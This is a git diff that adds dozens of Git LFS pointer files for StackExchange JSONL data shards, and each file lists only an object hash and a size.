a/data/stackexchange/1-1/1262_2289.jsonl b/data/stackexchange/1-1/1262_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..901ad4092b793acb13760c9fa719bfc57bb426a6 --- /dev/null +++ b/data/stackexchange/1-1/1262_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e12d7f91b6b69e42015879f005727e1798011183b93ca8ee201811fe6e7e7b5d +size 34850202 diff --git a/data/stackexchange/1-1/1263_2289.jsonl b/data/stackexchange/1-1/1263_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5b124e055f2c0acbd1db4cea7100380a6f64525b --- /dev/null +++ b/data/stackexchange/1-1/1263_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c86765795bf6e000672f6ed7937bd7e01e998fba0e307048adffdeaff440df35 +size 35597244 diff --git a/data/stackexchange/1-1/1264_2289.jsonl b/data/stackexchange/1-1/1264_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..23bb4786c23aa5ff3aae1a93a8ef6dcce6bd7522 --- /dev/null +++ b/data/stackexchange/1-1/1264_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7c062a7fb351f82cb1685bd92b3f5f747bbf705ba6a10a1e7a5f9e848d17a4c6 +size 34567052 diff --git a/data/stackexchange/1-1/1265_2289.jsonl b/data/stackexchange/1-1/1265_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3d7d16067ed96cae354bef3bcb7276144405e88d --- /dev/null +++ b/data/stackexchange/1-1/1265_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:50665ddf10352f637aaf5ef99487b3937f678a18eba2c0362c640f7e962464c4 +size 35469684 diff --git a/data/stackexchange/1-1/1266_2289.jsonl b/data/stackexchange/1-1/1266_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8670854d71d630b90a5bfb90477a917eb9af44ef --- /dev/null +++ b/data/stackexchange/1-1/1266_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b0f6ffb33863459b59f6ab62be175740d62a5a12008ecd67b2719aa5f339efe6 +size 35278566 diff --git a/data/stackexchange/1-1/1267_2289.jsonl b/data/stackexchange/1-1/1267_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ddc6d7eaaf48b8402c884659f04db74d792e1f26 --- /dev/null +++ b/data/stackexchange/1-1/1267_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:71a6052999b89674aa8a0fdcdf623d831b2aadf68ed674b16502965963040b83 +size 34866443 diff --git a/data/stackexchange/1-1/1268_2289.jsonl b/data/stackexchange/1-1/1268_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..8c039e324e7b4dc029bbe8d8ef757bfb709aee73 --- /dev/null +++ b/data/stackexchange/1-1/1268_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:deca77efe38ddcab398eeed52e7d4ede9b9bb8ed828e5d69c08a55b4eaa94f1d +size 34726785 diff --git a/data/stackexchange/1-1/1269_2289.jsonl b/data/stackexchange/1-1/1269_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b3651e934c4adc7c44e25763a15cc0543b1a9c52 --- /dev/null +++ b/data/stackexchange/1-1/1269_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:07e7b982327790e85309650b0a6427f9ad97c846af02b7e4ef992a70edc71974 +size 34442274 diff --git a/data/stackexchange/1-1/126_2289.jsonl b/data/stackexchange/1-1/126_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7770d06b8f235453c24f7b61b13fa88b440d74b7 --- /dev/null +++ b/data/stackexchange/1-1/126_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:03267cf1b693439d21880c6f11c5155547e6c153bb50e34116b340545a283038 +size 33414025 diff --git a/data/stackexchange/1-1/1270_2289.jsonl b/data/stackexchange/1-1/1270_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..07da27f9d8f380657df5cf5192cd545f968105b9 --- /dev/null +++ b/data/stackexchange/1-1/1270_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8da8942a93907f2808931133517214c3b75733707c2f391bf07a468c800627cc +size 35017895 diff --git a/data/stackexchange/1-1/1271_2289.jsonl b/data/stackexchange/1-1/1271_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..cd3c88f67ffc6448127ffaad06ee739e91006b02 --- /dev/null +++ b/data/stackexchange/1-1/1271_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4d3160731e923afed1d9c26cf0bb20643d73975a5ac176b5e88b4b6272b87a20 +size 35050134 diff --git a/data/stackexchange/1-1/1272_2289.jsonl b/data/stackexchange/1-1/1272_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..83f9603bc27a91d1fafd7f8881b6f837e9cd728e --- /dev/null +++ b/data/stackexchange/1-1/1272_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a5a09d3c59f4de8fc2e69e8c143a4b922e83ff7a39b674474fbd843cdc5f092b +size 35019020 diff --git a/data/stackexchange/1-1/1273_2289.jsonl b/data/stackexchange/1-1/1273_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..06c4e334eae465ff0c2cffae30c27c20890a99c6 --- /dev/null +++ b/data/stackexchange/1-1/1273_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b6b2c1e1578b6bc7d7c923b0a59a277205e2a25372ff86d13c6e9368cd0d9b47 +size 34918814 diff --git a/data/stackexchange/1-1/1274_2289.jsonl b/data/stackexchange/1-1/1274_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b9c5aa899387aa64643688cdbcbe56e9da4f0fdc --- /dev/null +++ b/data/stackexchange/1-1/1274_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8728f724fb1eec289f770bc6dde6896184d1154bba020fc39641cbc578a4ca91 +size 35517869 diff --git a/data/stackexchange/1-1/1275_2289.jsonl b/data/stackexchange/1-1/1275_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1d82cf965e6ddfd5dd199e80b2f6651b950ab456 --- /dev/null +++ b/data/stackexchange/1-1/1275_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:dc5b9239aaaca02b8c46f5035b2f2821a610ef5833ee99a5dad06591384c2e60 +size 35114666 diff --git a/data/stackexchange/1-1/1276_2289.jsonl b/data/stackexchange/1-1/1276_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a2baf73e00b090783be38a81ac4741aaa1258826 --- /dev/null +++ b/data/stackexchange/1-1/1276_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f92eef10313bb8e3ebf476b70d395ecc23673c79fbbd542dab529dfddc52dc6f +size 35149841 diff --git a/data/stackexchange/1-1/1277_2289.jsonl b/data/stackexchange/1-1/1277_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..365cb91e032ca66407b958828d0ab5fa88cbe883 --- /dev/null +++ b/data/stackexchange/1-1/1277_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:76aa033da41bcc08da45bc60e03b780aa02d50b0fae93be36874719e72bc1f08 +size 35058027 diff --git a/data/stackexchange/1-1/1278_2289.jsonl b/data/stackexchange/1-1/1278_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0f837619cf907d274b5fc7d6cf669ceeb974d601 --- /dev/null +++ b/data/stackexchange/1-1/1278_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7cdbd79d3fca39a5d498555546b6af0a9e22fe93b9f44352b661301860eeeefe +size 34781158 diff --git a/data/stackexchange/1-1/1279_2289.jsonl b/data/stackexchange/1-1/1279_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9a396a9200a4047ccbdab1f0ec45eb1a7f3c634f --- /dev/null +++ b/data/stackexchange/1-1/1279_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3e49f4c04f06a96a3c5fc74d0a99a5dc8a608124bd412ceefc25df576f513b2b +size 34735384 diff --git a/data/stackexchange/1-1/127_2289.jsonl b/data/stackexchange/1-1/127_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..affdfe28afd62c9699730357e3ad37c6cc802a87 --- /dev/null +++ b/data/stackexchange/1-1/127_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c6e6b1842b959b40fe519d7a8cd84574a79d695f6148159d0f0924e18a18e161 +size 33793272 diff --git a/data/stackexchange/1-1/1280_2289.jsonl b/data/stackexchange/1-1/1280_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1ef8e57842d5a35fc9c670e7d539d44953259da9 --- /dev/null +++ b/data/stackexchange/1-1/1280_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c176d88b24a0343668800499b0942e56dc6eddb96969db62bbf4f3b582e82f82 +size 35444204 diff --git a/data/stackexchange/1-1/1281_2289.jsonl b/data/stackexchange/1-1/1281_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c8c8bc1837128f57589b111c4a373ee8064fcb10 --- /dev/null +++ b/data/stackexchange/1-1/1281_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b0402002ea7a6ce7de74fbc0deb1f5931901789ce00bd4562c4a60d25806170a +size 34859381 diff --git a/data/stackexchange/1-1/1282_2289.jsonl b/data/stackexchange/1-1/1282_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d98d43ed391e73fe1e657c21b0c2ac81423e33a3 --- /dev/null +++ b/data/stackexchange/1-1/1282_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d5d404140d8c9f3b0357a3c766b0dcee96acf16059db950813ed2fca58d4987b +size 35052062 diff --git a/data/stackexchange/1-1/1283_2289.jsonl b/data/stackexchange/1-1/1283_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..89c1ff96016729a4a2c77037313fe6c5582f582f --- /dev/null +++ b/data/stackexchange/1-1/1283_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bec31ea894e10070218837cd853069e06077ad3f74a2ee37dea18e77e42b8717 +size 34828234 diff --git a/data/stackexchange/1-1/1284_2289.jsonl b/data/stackexchange/1-1/1284_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..dbf0c7bebc52e0e90d552dff32a851c4e1f28475 --- /dev/null +++ b/data/stackexchange/1-1/1284_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5775465135d4a2ba4535d3224c0c55e88af8df2d70cfa22f5c8d11b08c2c3201 +size 34832944 diff --git a/data/stackexchange/1-1/1285_2289.jsonl b/data/stackexchange/1-1/1285_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..eccc02702f6c530f0fe82272e8d49af1ca8f62e9 --- /dev/null +++ b/data/stackexchange/1-1/1285_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7b0e71ae4602fc1c497891439d0bb2f13ca6d4a0cb189ed5aeb839a4eb524883 +size 35370071 diff --git a/data/stackexchange/1-1/1286_2289.jsonl b/data/stackexchange/1-1/1286_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8e86470bbd9b5b9c6671c01464afcaf39a798aac --- /dev/null +++ b/data/stackexchange/1-1/1286_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:19f59d8caebdb501f58596df83479db007ddb5989589c474027e22c21212d56e +size 34934049 diff --git a/data/stackexchange/1-1/1287_2289.jsonl b/data/stackexchange/1-1/1287_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3582f5fc15839efe37b094159bf62c276a36df88 --- /dev/null +++ b/data/stackexchange/1-1/1287_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:12b88091b97ba55e832c3bb08f9da55a47288ee04895b48e27de6f4d70490fb4 +size 34793415 diff --git a/data/stackexchange/1-1/1288_2289.jsonl b/data/stackexchange/1-1/1288_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a2f1ddef1090f755012012e67a6ecd4d5264dd7f --- /dev/null +++ b/data/stackexchange/1-1/1288_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1deb8ce89ba262796db07fc2bc203789c6986d4483314727b5b504cfe56afc73 +size 34113834 diff --git a/data/stackexchange/1-1/1289_2289.jsonl b/data/stackexchange/1-1/1289_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..dfaa58f6a0a36f7dc3e013f2fbaaa627bc259fe8 --- /dev/null +++ b/data/stackexchange/1-1/1289_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:984ecd85bc7e865937690c389ebf59656194ac65dac964c5bfda698be8ae8103 +size 39281317 diff --git a/data/stackexchange/1-1/128_2289.jsonl b/data/stackexchange/1-1/128_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4fd0453d6b0fabf811c3cb55d091be0bd66f0ab6 --- /dev/null +++ b/data/stackexchange/1-1/128_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:348f00d2fc8c3b262fb004858e920868f2cb77b72c70348b91933302ec447c70 +size 33594247 diff --git a/data/stackexchange/1-1/1290_2289.jsonl b/data/stackexchange/1-1/1290_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e584b027065e034d26c19709d61a41612680aeb0 --- /dev/null +++ b/data/stackexchange/1-1/1290_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:855ca507b25a543ce84b1e19acc28814fdb9dd24ce3458b3aef9e82c14bbec72 +size 39713460 diff --git a/data/stackexchange/1-1/1291_2289.jsonl b/data/stackexchange/1-1/1291_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..34ab44989e520b13f153bb1cf054073d343ee912 --- /dev/null +++ b/data/stackexchange/1-1/1291_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a0cbd3f3ffd7d42b2231446887c8b45c75465f8be3069bfa7a9ea78750c4547a +size 39385314 diff --git a/data/stackexchange/1-1/1292_2289.jsonl b/data/stackexchange/1-1/1292_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..bb9b1a9f2ad2bb42fc25682495ed693c33dc2686 --- /dev/null +++ b/data/stackexchange/1-1/1292_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7da0de1555ebee991ca7f0469548a6b6fb3d0ad2198438d82a4bd184d37677f4 +size 39487518 diff --git a/data/stackexchange/1-1/1293_2289.jsonl b/data/stackexchange/1-1/1293_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f719824c5ed1a44f672f227a7235c1e1791573e0 --- /dev/null +++ b/data/stackexchange/1-1/1293_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d2f06140ccbd8def02c7f394c3a6bde2ab94683d913368aae9c6fbcb63d3d184 +size 39479863 diff --git a/data/stackexchange/1-1/1294_2289.jsonl b/data/stackexchange/1-1/1294_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6f961d7d53943c30f7a2c99dd0dae152ce6234f6 --- /dev/null +++ b/data/stackexchange/1-1/1294_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fb3df592e5507dbbb23fca68b4e81b0fefb6a5e5bf82a5653a7b6a6d22ad6501 +size 40003201 diff --git a/data/stackexchange/1-1/1295_2289.jsonl b/data/stackexchange/1-1/1295_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0771a2dfd63bc4c7724ab8c805582149ab7c0f69 --- /dev/null +++ b/data/stackexchange/1-1/1295_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:60a2766fc729300fff02063fc49ffca3ccba34d65d160632163f582ab71fc5f1 +size 38998134 diff --git a/data/stackexchange/1-1/1296_2289.jsonl b/data/stackexchange/1-1/1296_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d3676496334326c6396aa1b7436153226f72b2f1 --- /dev/null +++ b/data/stackexchange/1-1/1296_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c18759e61ec95c00856bce156a3f490b07ba2ff54bafb3f04fc81a6b753e2635 +size 39185972 diff --git a/data/stackexchange/1-1/1297_2289.jsonl b/data/stackexchange/1-1/1297_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..57bc563509f9fb136093187f1dc60f7148c9696a --- /dev/null +++ b/data/stackexchange/1-1/1297_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:877172cfc3e936241fa934f18c000a7971d6cd2772d79ed96ba5510c15560782 +size 39662612 diff --git a/data/stackexchange/1-1/1298_2289.jsonl b/data/stackexchange/1-1/1298_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2be4ec6dfbab65f0f57d86b5053f9945ca8bfa7d --- /dev/null +++ b/data/stackexchange/1-1/1298_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:849652acce1a8dcd713a8371f3c2a12109cfd6a6f507dc280b6cf23cd0f20362 +size 39362034 diff --git a/data/stackexchange/1-1/1299_2289.jsonl b/data/stackexchange/1-1/1299_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..a43d1eed6894d3e58386e512e294785a5a7df7ef --- /dev/null +++ b/data/stackexchange/1-1/1299_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:59095907ab9f08f64ba1d7b84d38c5ab85b6f9ab991dce64f4cdbbf73374d56f +size 39743543 diff --git a/data/stackexchange/1-1/129_2289.jsonl b/data/stackexchange/1-1/129_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a0ee47ccd620903d5f65d6bdd0155c50e9615d47 --- /dev/null +++ b/data/stackexchange/1-1/129_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b93e9e0a9c148b103963c21f53b15d1e679f63d253b6fd0d7c67609b6babf9f1 +size 33601495 diff --git a/data/stackexchange/1-1/12_2289.jsonl b/data/stackexchange/1-1/12_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d07a493a77964616687cf7e8c4e906d4a0a70a2b --- /dev/null +++ b/data/stackexchange/1-1/12_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:535fc688f9cf433aa4493def6e7285d71801566c29560f29242f44c94906068e +size 36048550 diff --git a/data/stackexchange/1-1/1300_2289.jsonl b/data/stackexchange/1-1/1300_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ae998750c613c6a13952584aec152186e952b952 --- /dev/null +++ b/data/stackexchange/1-1/1300_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d95ce121779cc7cdbd5d3d3fcb7b36adb2a90283b71cca9582f8ee4222eeb59c +size 39511462 diff --git a/data/stackexchange/1-1/1301_2289.jsonl b/data/stackexchange/1-1/1301_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c1d7578dd45f601e3005b7a7c810d4c53c69eb6b --- /dev/null +++ b/data/stackexchange/1-1/1301_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7248d2393152d8e24fdefbbe86c501e333a2701fe2d24acf158766e51f30814e +size 39593912 diff --git a/data/stackexchange/1-1/1302_2289.jsonl b/data/stackexchange/1-1/1302_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..65fc403c4fdbd8c7debcb5a0d7e2ade0df597b2f --- /dev/null +++ b/data/stackexchange/1-1/1302_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d4662f426c019fb8e87bf4a66a957fbb89dbdac14da41f6e651c5cbefab07e8f +size 40187557 diff --git a/data/stackexchange/1-1/1303_2289.jsonl b/data/stackexchange/1-1/1303_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5aa39581fce64253b56d2c0cbeec5d1f331133de --- /dev/null +++ b/data/stackexchange/1-1/1303_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2257b078235843da646474744a38b0ebf0811e2d3480f76c3b9f05ccc96452fe +size 38977960 diff --git a/data/stackexchange/1-1/1304_2289.jsonl b/data/stackexchange/1-1/1304_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..41a8e989b0a9233f3fdd7889e0f9f0f214c1a213 --- /dev/null +++ b/data/stackexchange/1-1/1304_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2a9a6dc0cafb601cdb74f080ab10c2fd6f11fe38918a973b4da51adb33eedfd3 +size 39276239 diff --git a/data/stackexchange/1-1/1305_2289.jsonl b/data/stackexchange/1-1/1305_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3145302841552f11c4e02d2d440b98acf27be970 --- /dev/null +++ b/data/stackexchange/1-1/1305_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:e4b7fd2b323922fa860130162838ac8f1fe5072a687919e4f46fd77ef2cc5466 +size 39358105 diff --git a/data/stackexchange/1-1/1306_2289.jsonl b/data/stackexchange/1-1/1306_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ecbcaa752c4067de8af06bb0e15e09b10115476c --- /dev/null +++ b/data/stackexchange/1-1/1306_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b6b659308b0ae56c9d03bf4e11fd4a3c918cf7a0efeed1268fa4f528f1ed3a6d +size 39878591 diff --git a/data/stackexchange/1-1/1307_2289.jsonl b/data/stackexchange/1-1/1307_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..56da997958919fa9d99b38e29816d23f84287197 --- /dev/null +++ b/data/stackexchange/1-1/1307_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ab7bc71948d86109978b5d3f568f28e1bf973d50b7f69b9e8f23e3f8fb565f79 +size 39360843 diff --git a/data/stackexchange/1-1/1308_2289.jsonl b/data/stackexchange/1-1/1308_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d1ce5c0a1db8e0a5ce3362a2ff3ebd357f64a905 --- /dev/null +++ b/data/stackexchange/1-1/1308_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:37aaa97f9db736d8453e4d39accf2c25c636e63ab9a4fb713696569f2ec2d9aa +size 39872545 diff --git a/data/stackexchange/1-1/1309_2289.jsonl b/data/stackexchange/1-1/1309_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..072d82db2f352c5601af2a5e31958307df86f18c --- /dev/null +++ b/data/stackexchange/1-1/1309_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:71a443d09de2d30f5b9b172429c0eeedcc8f39454d02b18ff012468cf8c99ec1 +size 39802569 diff --git a/data/stackexchange/1-1/130_2289.jsonl b/data/stackexchange/1-1/130_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2d987344824f83fe0986adcd6da9a2962bb939ea --- /dev/null +++ b/data/stackexchange/1-1/130_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d77bf0feb76cd32dc96c83ebe5e73b9e9fd6096bdee754a5b26a874053af122b +size 33858895 diff --git a/data/stackexchange/1-1/1310_2289.jsonl b/data/stackexchange/1-1/1310_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..59c8d70041a7880946c454a050d0ee9a0d778ed9 --- /dev/null +++ b/data/stackexchange/1-1/1310_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b81ae052ccc50b05d74513982f63f13233437f574df7a19deaf92f88cc3fef63 +size 39602008 diff --git a/data/stackexchange/1-1/1311_2289.jsonl b/data/stackexchange/1-1/1311_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9dbf437d346c92368340f399d5b59380f24cf23d --- /dev/null +++ b/data/stackexchange/1-1/1311_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e7ca00089860b53e7f0f34df6c188badcaf78ddd67a0b2ddc51303d4a21fb99e +size 39817908 diff --git a/data/stackexchange/1-1/1312_2289.jsonl b/data/stackexchange/1-1/1312_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..72b1e127832219c6d4e9c56aa7e43b1ba3da31df --- /dev/null +++ b/data/stackexchange/1-1/1312_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f799ff63ba3b38970e66395a0d73d163d11f4c337f6ba311f9debbb182e73aba +size 39843809 diff --git a/data/stackexchange/1-1/1313_2289.jsonl b/data/stackexchange/1-1/1313_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..32ae13535702d7aee7fd0860f051eb19c442cd43 --- /dev/null +++ b/data/stackexchange/1-1/1313_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:499fc125f918cdb13450d92e441ba89b2a21c67211655c7ea418f8ed84de8b6d +size 39706789 diff --git a/data/stackexchange/1-1/1314_2289.jsonl b/data/stackexchange/1-1/1314_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c9f5dc566e71715ebe3903d4bd0290d1b5206e43 --- /dev/null +++ b/data/stackexchange/1-1/1314_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ced061123550442fff32d85a2874e050d395362a9e7bf61f286a8c2c50190b6b +size 39552017 diff --git a/data/stackexchange/1-1/1315_2289.jsonl b/data/stackexchange/1-1/1315_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1cbeaa72456f8658b73f8c887f849535f1f6bc09 --- /dev/null +++ b/data/stackexchange/1-1/1315_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:16edea2dca19c3bf47ebb887a199eb5d852295d888669a1a11347c144bff1ffc +size 39683394 diff --git a/data/stackexchange/1-1/1316_2289.jsonl b/data/stackexchange/1-1/1316_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d304ffb21dbbd2c59d6bd96d4ec97617f677fa8d --- /dev/null +++ b/data/stackexchange/1-1/1316_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:655f1e3becf5fc9f566d03b14fd9ea47dd743a329c7779b14c214ad9e4a59930 +size 39721844 diff --git a/data/stackexchange/1-1/1317_2289.jsonl b/data/stackexchange/1-1/1317_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..fabc28c3d80c16953d3f85a41b28357e3a3f09fd --- /dev/null +++ b/data/stackexchange/1-1/1317_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fcb3d913075183dd0687cdd29c61262dad9817060800c5988e89caee6ae1bcca +size 39407996 diff --git a/data/stackexchange/1-1/1318_2289.jsonl b/data/stackexchange/1-1/1318_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9c43cfbb6b7ca3c5eeb099b32f9c1412a37b6932 --- /dev/null +++ b/data/stackexchange/1-1/1318_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:dfac2286af7e7d7b1395d766f2f8024287c7bb7b4bbd6e8d64d8b243a46233e6 +size 39937972 diff --git a/data/stackexchange/1-1/1319_2289.jsonl b/data/stackexchange/1-1/1319_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..fe62205be7986516c47987dfd45f9dcbfee36b45 --- /dev/null +++ b/data/stackexchange/1-1/1319_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:05ee9e8fcc33aa94eb643a81a2544b72050864540dfcbddc4c3323e8af8832f7 +size 39557195 diff --git a/data/stackexchange/1-1/131_2289.jsonl b/data/stackexchange/1-1/131_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0a9384d163bdf7f9dd593311eb92d3554f6db4ca --- /dev/null +++ b/data/stackexchange/1-1/131_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:58df0230b4a20d6619ca4eac19be7d247feb469bc6edbaad33cb52363ffc62fc +size 33760496 diff --git 